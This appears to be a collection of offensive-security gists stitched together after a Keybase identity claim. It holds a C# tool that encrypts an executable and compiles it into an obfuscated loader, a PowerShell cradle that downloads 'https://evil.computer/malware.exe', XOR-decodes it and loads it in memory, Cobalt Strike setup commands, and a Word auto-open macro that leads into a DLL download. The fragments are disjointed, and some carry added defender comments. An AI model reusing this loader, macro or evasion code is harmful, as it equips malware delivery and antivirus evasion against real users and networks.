I hereby claim:
- I am vivami on github.
- I am vanmieghem (https://keybase.io/vanmieghem) on keybase.
- I have a public key whose fingerprint is D90D C025 6090 A35C BD62 C907 32F0 0526 6B85 75C8
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
String path = args[0]; | |
key = getRandomKey(); | |
String filename = Path.GetFileNameWithoutExtension(path).ToString(); | |
String obfuscatedBin = obfuscateBinary(path); | |
/// <summary>
/// Reads the file at <paramref name="file"/>, encrypts its bytes with the
/// enclosing type's <c>key</c>, and returns the ciphertext as Base64 text.
/// </summary>
/// <param name="file">Path of the binary to read.</param>
/// <returns>Base64 encoding of the encrypted file contents.</returns>
/// <remarks>
/// NOTE(review): the cipher, key size and file reading live in <c>encrypt</c>,
/// <c>getRandomKey</c> and <c>fileToByteArray</c>, none of which are visible
/// here. The returned string is presumably embedded in the generated loader
/// source, so for triage the artefact to look for is a small executable
/// carrying one very long Base64 literal. Confirm against the full file.
/// </remarks>
private String obfuscateBinary(String file)
{
    // Read, encrypt and encode in one pass; no intermediate copies are kept.
    return System.Convert.ToBase64String(encrypt(fileToByteArray(file), key));
}
compile(srcFinal, filename + "_obfuscated.exe"); | |
static void compile(String source, String outfile) { | |
var provider_options = new Dictionary<string, string> | |
{ | |
{"CompilerVersion","v3.5"} | |
}; | |
var provider = new Microsoft.CSharp.CSharpCodeProvider(provider_options); | |
var compiler_params = new System.CodeDom.Compiler.CompilerParameters(); |
public static string srcTemplate = @"using System; | |
using System.Collections.Generic; | |
using System.IO; | |
using System.Reflection; | |
using System.Security.Cryptography; | |
namespace Loader { | |
public static class Loader { | |
private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc }; |
# In-memory .NET loader: downloads a blob over HTTPS, XOR-decodes it with a
# repeating key, loads the result as an assembly and calls its Main method.
# The decoded assembly is never written to disk by this script.
#
# Defender notes:
#  - PowerShell script block logging (event ID 4104) records the
#    [System.Reflection.Assembly]::Load call and the download URL.
#  - On .NET Framework 4.8 and later, AMSI inspects assemblies loaded from a
#    byte array, so the decoded payload is visible to AV/EDR at load time.
#  - Proxy logs will show a powershell.exe request that carries a fixed
#    Firefox 49 User-Agent and authenticates with the logged-on user's
#    default credentials.

# Web client that blends in with browser traffic and goes through the system proxy.
$wc = New-Object System.Net.WebClient
$wc.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0")
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials

# Repeating-key XOR over the downloaded bytes; $i walks the key and wraps around.
$k = "XOR\_KEY"
$i = 0
[byte[]]$b = ([byte[]]($wc.DownloadData("https://evil.computer/malware.exe"))) | ForEach-Object { $_ -bxor $k[$i++ % $k.length] }

# Reflectively load the decoded assembly and invoke its entry point.
[System.Reflection.Assembly]::Load($b) | Out-Null
$parameters = @("arg1", "arg2")
[namespace.Class]::Main($parameters)
# Bring the Kali host fully up to date first.
apt update && apt upgrade -y

# Install Java 8 (required by Cobalt Strike) from the webupd8team PPA.
cd /opt

# NOTE(review): the repository is added over plain http and is trusted through
# a short 32-bit key id fetched from a keyserver over unencrypted hkp. Short
# key ids can collide, so the key that lands in apt's trust store is not
# pinned. Prefer fetching by the full fingerprint
# (<FULL_40_HEX_FINGERPRINT - placeholder, take it from the PPA page>) and
# verifying it before running apt-get update.
printf '%s\n' \
    "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" \
    "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" \
    | tee /etc/apt/sources.list.d/webupd8team-java.list
apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys eea14886
apt-get -y update

# Pre-seed debconf so the Oracle licence prompt is accepted non-interactively.
echo oracle-java8-installer shared/accepted-oracle-license-v1-1 select true | sudo /usr/bin/debconf-set-selections
' Auto-run entry point: Word executes AutoOpen when the document is opened
' with macros enabled. It only hands off to Debugging.
' Defender note: an auto-run macro that delegates to an innocuously named
' routine is worth following to its callee during triage.
Sub AutoOpen()
    Call Debugging
End Sub
' Document-open event handler: runs when the document is opened with macros
' enabled, and only hands off to Debugging.
' Defender note: an auto-run handler that delegates to an innocuously named
' routine is worth following to its callee during triage.
Sub Document_Open()
    Call Debugging
End Sub
Public Function Debugging() As Variant | |
DownloadDLL |